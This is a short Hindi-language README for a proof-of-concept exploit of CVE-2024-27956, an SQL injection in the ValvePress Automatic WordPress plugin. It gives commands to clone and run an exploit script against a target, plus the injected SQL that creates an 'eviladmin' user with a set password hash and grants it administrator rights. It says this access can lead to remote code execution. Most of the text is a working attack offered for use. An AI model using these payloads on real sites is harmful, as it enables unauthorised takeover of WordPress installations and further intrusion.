
CVE-2024-27956 में SQL इंजेक्शन के लिए PoC
CVE-2024-27956 के लिए एक PoC, ValvePress Automatic प्लगइन में एक SQL Injection। यह PoC कमजोरी का फायदा उठाकर लक्ष्य में एक उपयोगकर्ता बनाता है और उसे Administrator अधिकार देता है। wordpress में administrator होने से Remote Code Execution हो सकता है।
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
एडमिन अधिकार देना:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
q पैरामीटर में, हम अपनी पूरी क्वेरी पास कर सकते हैं और फिर यह निष्पादित हो जाएगी।
उपयोगकर्ता इनपुट बिना किसी प्रतिबंध या सैनिटाइज़ेशन के सीधे निष्पादित किया जाता है।
